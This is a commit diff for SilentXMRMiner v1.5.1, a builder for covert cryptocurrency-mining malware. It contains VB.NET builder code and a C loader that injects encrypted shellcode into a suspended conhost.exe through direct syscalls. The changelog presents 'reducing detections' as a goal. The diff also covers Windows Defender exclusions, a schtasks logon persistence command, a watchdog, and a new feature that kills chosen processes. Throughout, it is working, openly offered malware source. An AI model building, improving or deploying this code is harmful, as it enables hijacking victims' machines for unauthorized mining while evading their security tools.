Updated to v1.5.1

* Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
* Changed system calls to direct system calls thus reducing detections
* Changed native loader code to reduce detections
* Removed Online Download feature due to domain being taken down
* Improved overall code
* Updated miner

CHANGELOG.md

@@ -1,3 +1,10 @@
+### v1.5.1 (09/10/2021)
+* Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
+* Changed system calls to direct system calls thus reducing detections
+* Changed native loader code to reduce detections
+* Removed Online Download feature due to domain being taken down
+* Improved overall code
+* Updated miner
 ### v1.5.0 (02/10/2021)
 **The previous version was supposed to be the last one before the unified miner but I recieved great results by loading everything by Shellcode making it worthwhile to update**
 * Added new Shellcode loader, the miner, watchdog and uninstaller will now be converted into shellcode and injected using a native C loader which greatly reduces detections

README.md

@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner.png?raw=true">
 
-# SilentXMRMiner v1.5.0 - Based on Lime Miner v0.3
+# SilentXMRMiner v1.5.1 - Based on Lime Miner v0.3
 
 Can mine all the following algorithms and thus all the cryptocurrencies that use them:
 <details>
@@ -52,7 +52,7 @@ Can mine all the following algorithms and thus all the cryptocurrencies that use
 * Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down
 * Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes
 * Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses
-* Online Downloader - Can download the miner binary during runtime to greatly decrease file size
+* Process Killer - Constantly checks for any programs in the "Kill Targets" and kills them if found
 
 ## Downloads
 
@@ -68,6 +68,13 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
 
 ## Changelog
 
+### v1.5.1 (09/10/2021)
+* Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
+* Changed system calls to direct system calls thus reducing detections
+* Changed native loader code to reduce detections
+* Removed Online Download feature due to domain being taken down
+* Improved overall code
+* Updated miner
 ### v1.5.0 (02/10/2021)
 **The previous version was supposed to be the last one before the unified miner but I recieved great results by loading everything by Shellcode making it worthwhile to update**
 * Added new Shellcode loader, the miner, watchdog and uninstaller will now be converted into shellcode and injected using a native C loader which greatly reduces detections

SilentXMRMiner/Codedom.vb

@@ -52,14 +52,12 @@ Public Class Codedom
             F.txtLog.Text = F.txtLog.Text + ("Creating resources..." + vbNewLine)
 
             Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Res + ".Resources")
-                If Not F.FA.toggleDownloader.Checked Then
-                    R.AddResource(F.Resources_xmrig, F.AES_Encryptor(My.Resources.xmrig))
-                End If
+                R.AddResource(F.Resources_xmrig, F.AES_Encryptor(My.Resources.xmrig))
                 R.AddResource(F.Resources_winring, F.AES_Encryptor(My.Resources.WinRing0x64))
                 If F.chkInstall.Checked And F.toggleWatchdog.Checked Then
                     R.AddResource(F.Resources_watchdog, F.AES_Encryptor(F.watchdogdata))
                 End If
-                If F.toggleEnableGPU.Checked And Not F.FA.toggleDownloader.Checked Then
+                If F.toggleEnableGPU.Checked Then
                     R.AddResource(F.Resources_libs, F.AES_Encryptor(My.Resources.libs))
                 End If
                 R.Generate()
@@ -139,6 +137,7 @@ Public Class Codedom
             Dim filename = Path.GetFileNameWithoutExtension(SavePath)
             Dim paths As Dictionary(Of String, String) = New Dictionary(Of String, String)() From {
                     {"current", currentDirectory},
+                    {"includes", Path.Combine(currentDirectory, "Includes")},
                     {"compilers", Path.Combine(currentDirectory, "Compilers")},
                     {"compilerslog", Path.Combine(currentDirectory, "Compilers\logs")},
                     {"windres", Path.Combine(currentDirectory, "Compilers\MinGW64\bin\windres.exe")},
@@ -163,6 +162,12 @@ Public Class Codedom
                 End Using
             End If
 
+            If Not Directory.Exists(paths("includes")) Then
+                Using archive As ZipArchive = New ZipArchive(New MemoryStream(My.Resources.Includes))
+                    archive.ExtractToDirectory(paths("includes"))
+                End Using
+            End If
+
             Dim sb As StringBuilder = New StringBuilder(My.Resources.Program1)
             Dim buildResource As Boolean = Not String.IsNullOrEmpty(ICOPath) OrElse RequireAdministrator OrElse AssemblyData
 
@@ -200,20 +205,23 @@ Public Class Codedom
                 If F.BuildErrorTest(Not File.Exists(paths("resource.o")), String.Format("Error: Failed at compiling resources, check the error log at {0}.", paths("windreslog"))) Then Return
             End If
 
-            F.RunExternalProgram(paths("donut"), String.Format("""{0}"" -a 2 -f 1", InputFile), currentDirectory, paths("tcclog"))
+            F.RunExternalProgram(paths("donut"), String.Format("""{0}"" -a 2 -f 1", InputFile), currentDirectory, paths("donutlog"))
             Dim shellcodebytes As String = File.ReadAllText(paths("loader"), Encoding.GetEncoding("ISO-8859-1"))
             Dim shellcode As String = F.ToLiteral(F.Cipher(shellcodebytes, F.Key))
 
+            sb.Replace("#KEYLENGTH", F.Key.Length)
             sb.Replace("#KEY", F.Key)
             sb.Replace("#DELAY", F.txtStartDelay.Text)
             sb.Replace("#SHELLCODELENGTH", shellcodebytes.Length)
             sb.Replace("#SHELLCODE", shellcode)
             sb.Replace("#ARGS", Args)
             F.CipherReplace(sb, "#ENV", "SystemRoot")
-            F.CipherReplace(sb, "#TARGET", "System32\\conhost.exe")
+            F.CipherReplace(sb, "#TARGET", "System32\conhost.exe")
+            F.CipherReplace(sb, "#FORMAT1", "%s\%s")
+            F.CipherReplace(sb, "#FORMAT2", """%s"" ""%s""")
 
             File.WriteAllText(paths("filename") & ".c", sb.ToString(), Encoding.GetEncoding("ISO-8859-1"))
-            F.RunExternalProgram(paths("tcc"), String.Format("-Wall -Wl,-subsystem=windows ""{0}"" {1} -lntdll", paths("filename") & ".c", If(buildResource, "resource.o", "")), currentDirectory, paths("tcclog"))
+            F.RunExternalProgram(paths("tcc"), String.Format("-Wl,-subsystem=windows ""{0}"" {1} ""{2}"" -xa ""{3}"" ", filename & ".c", If(buildResource, "resource.o", ""), Path.Combine(currentDirectory, "Includes\syscalls.c"), Path.Combine(currentDirectory, "Includes\syscallsstubs.asm")), currentDirectory, paths("tcclog"))
             File.Delete(paths("resource.o"))
             File.Delete(paths("filename") & ".c")
             File.Delete(paths("loader"))
@@ -281,10 +289,6 @@ Public Class Codedom
             stringb.Replace("DefDebug", "true")
         End If
 
-        If F.FA.toggleDownloader.Checked Then
-            stringb.Replace("DefDownloader", "true")
-        End If
-
         If F.toggleEnableGPU.Checked Then
             stringb.Replace("DefGPU", "true")
         End If
@@ -311,9 +315,9 @@ Public Class Codedom
 
             If F.FA.toggleInstallSystem32.Checked Then
                 stringb.Replace("DefSystem32", "true")
-                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & "), Encoding.ASCII.GetString(_rAESMethod_(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & "), _rGetString_(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))")
             Else
-                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & ", Encoding.ASCII.GetString(_rAESMethod_(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & ", _rGetString_(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))")
             End If
 
             If F.toggleWatchdog.Checked Then
@@ -338,10 +342,6 @@ Public Class Codedom
         stringb.Replace("#KEY", F.AESKEY)
         stringb.Replace("#SALT", F.SALT)
         stringb.Replace("#IV", F.IV)
-        stringb.Replace("#SANCTAMLIBSURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=libs"))
-        stringb.Replace("#SANCTAMMINERURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig"))
-        stringb.Replace("#LIBSURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/libs.zip"))
-        stringb.Replace("#MINERURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip"))
         stringb.Replace("#LIBSPATH", F.EncryptString("Microsoft\Libs\"))
         stringb.Replace("#WATCHDOG", F.EncryptString("sihost64"))
         stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn """ + Path.GetFileNameWithoutExtension(F.txtInstallFileName.Text) + """ /tr ""{0}"""))

SilentXMRMiner/Form1.vb

@@ -38,7 +38,7 @@ Public Class Form1
     Public SALT As String = Randomi(32)
     Public IV As String = Randomi(16)
 
-    Public Key = RandomString(32)
+    Public Key As String = RandomString(32)
 
     Public InjectionTarget As String()
     Private Sub btnBuild_Click(sender As Object, e As EventArgs) Handles btnBuild.Click
@@ -85,7 +85,7 @@ Public Class Form1
                 Return
             End If
 
-            Dim argstr As String = " --cinit-find-x -B --algo=""" & algo & """" & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " " & If(toggleEnableStealth.Checked, " --cinit-stealth-targets=""" & Unamlib_Encrypt(FA.txtStealthTargets.Text) & """", "") & " "
+            Dim argstr As String = " --cinit-find-x -B --algo=""" & algo & """" & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " " & If(toggleEnableStealth.Checked, " --cinit-stealth-targets=""" & Unamlib_Encrypt(FA.txtStealthTargets.Text) & """", "") & " " & If(FA.toggleProcessKiller.Checked, " --cinit-kill-targets=""" & Unamlib_Encrypt(FA.txtKillTargers.Text) & """", "") & " "
 
             minerbuilder.Replace("#dll", Resources_dll)
             minerbuilder.Replace("#xmr", Resources_xmrig)
@@ -114,6 +114,10 @@ Public Class Form1
                 argstr += " --cinit-stealth "
             End If
 
+            If FA.toggleProcessKiller.Checked Then
+                argstr += " --cinit-kill "
+            End If
+
             minerbuilder.Replace("#ARGSTR", EncryptString(argstr))
 
             If chkInstall.Checked Then
@@ -164,7 +168,7 @@ Public Class Form1
                 Codedom.UninstallerCompiler(uninstallerpath & If(FA.toggleShellcode.Checked, "-payload.exe", ".exe"))
 
                 If FA.toggleShellcode.Checked Then
-                    Codedom.LoaderCompiler(uninstallerpath & ".exe", uninstallerpath & "-payload.exe", """""", Nothing, False, True)
+                    Codedom.LoaderCompiler(uninstallerpath & ".exe", uninstallerpath & "-payload.exe", """""", Nothing, False, FA.toggleAdministrator.Checked)
                     If Codedom.LoaderOK Then
                         Try
                             File.Delete(uninstallerpath & "-payload.exe")
@@ -257,7 +261,7 @@ Public Class Form1
     End Function
 
     Public Function EncryptString(ByVal input As String)
-        Return Convert.ToBase64String(AES_Encryptor(Encoding.ASCII.GetBytes(input)))
+        Return Convert.ToBase64String(AES_Encryptor(Encoding.UTF8.GetBytes(input)))
     End Function
 
     Public Function Randomi(ByVal length As Integer) As String
@@ -316,7 +320,7 @@ Public Class Form1
 
         While i < length
             buffer(i) = chars(rand.Next(0, clength))
-            Threading.Interlocked.Increment(i)
+            i += 1
         End While
 
         Return New String(buffer)

SilentXMRMiner/My Project/Resources.resx

@@ -157,4 +157,7 @@
   <data name="Compilers" type="System.Resources.ResXFileRef, System.Windows.Forms">
     <value>..\Resources\Compilers.zip;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
   </data>
+  <data name="Includes" type="System.Resources.ResXFileRef, System.Windows.Forms">
+    <value>..\Resources\Includes.zip;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
+  </data>
 </root>

SilentXMRMiner/Resources/Program.c

@@ -2,55 +2,41 @@
 #include <stdlib.h>
 #include <windows.h>
 #include <sys/types.h>
-#include <syscalls.h>
+#include "syscalls.h"
 
 /* Created by Unam Sanctam, https://github.com/UnamSanctam */
 
 char* cipher(char* data, long dataLen) {
-	char* key = "#KEY";
-	int keyLen = strlen(key);
 	char* output = (char*)malloc(sizeof(char) * dataLen+1);
 	output[dataLen] = 0;
-	for (int i = 0; i < dataLen; ++i) {
-		output[i] = data[i] ^ key[i % keyLen];
+	for (int i = 0; i < dataLen; i++) {
+		output[i] = data[i] ^ "#KEY"[i % #KEYLENGTH];
 	}
 	return output;
 }
 
-int main(int argc, char **argv){
+int main(int argc, char** argv) {
 	Sleep(#DELAY * 1000);
 
 	PROCESS_INFORMATION p_info;
-	STARTUPINFO s_info;
+	STARTUPINFO s_info = {sizeof(s_info)};
 	LPVOID apointer = NULL;
 	SIZE_T size = #SHELLCODELENGTH;
 	SIZE_T bytes = 0;
 	HANDLE hThread;
-	TCHAR buffer[MAX_PATH]={0};
-	TCHAR injectpath[MAX_PATH + 1000];
-	TCHAR args[MAX_PATH + 1000];
+	TCHAR* buffer;
+	TCHAR injectpath[MAX_PATH*2];
+	TCHAR args[MAX_PATH*2];
 
-	ZeroMemory(&s_info, sizeof(s_info));
-	ZeroMemory(&p_info, sizeof(p_info));
-	s_info.cb = sizeof(s_info);
-
-	if (GetModuleFileName(NULL, buffer, sizeof(buffer) / sizeof(*buffer)))
-	{
-		sprintf(injectpath, "%s\\%s", getenv(cipher("#ENV", #ENVLENGTH)), cipher("#TARGET", #TARGETLENGTH));
-		sprintf(args, "\"%s\" \"%s\"", injectpath, #ARGS);
-		if (CreateProcess(injectpath, args, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &s_info, &p_info)) {
-			NtAllocateVirtualMemory(p_info.hProcess, &apointer, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-			if (apointer != NULL) {
-				printf("[+]Got the address to write 0x%x\n", apointer);
-				NtWriteVirtualMemory(p_info.hProcess, apointer, cipher("#SHELLCODE", #SHELLCODELENGTH), #SHELLCODELENGTH, &bytes);
-				if (bytes) {
-					NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, p_info.hProcess, apointer, apointer, FALSE, 0, 0, 0, NULL);
-				}
-				CloseHandle(p_info.hProcess);
-				CloseHandle(p_info.hThread);
-				return 1;
-			}
-		}
-	}
+	_get_pgmptr(&buffer);
+	sprintf(injectpath, cipher("#FORMAT1", #FORMAT1LENGTH), getenv(cipher("#ENV", #ENVLENGTH)), cipher("#TARGET", #TARGETLENGTH));
+	sprintf(args, cipher("#FORMAT2", #FORMAT2LENGTH), injectpath, #ARGS);
+	CreateProcess(injectpath, args, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &s_info, &p_info);
+	NtAllocateVirtualMemory(p_info.hProcess, &apointer, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+	NtWriteVirtualMemory(p_info.hProcess, apointer, cipher("#SHELLCODE", size), size, &bytes);
+	NtProtectVirtualMemory(p_info.hProcess, &apointer, &bytes, PAGE_EXECUTE, NULL);
+	NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, p_info.hProcess, apointer, apointer, FALSE, 0, 0, 0, NULL);
+	NtClose(p_info.hProcess);
+	NtClose(p_info.hThread);
 	return 0;
 }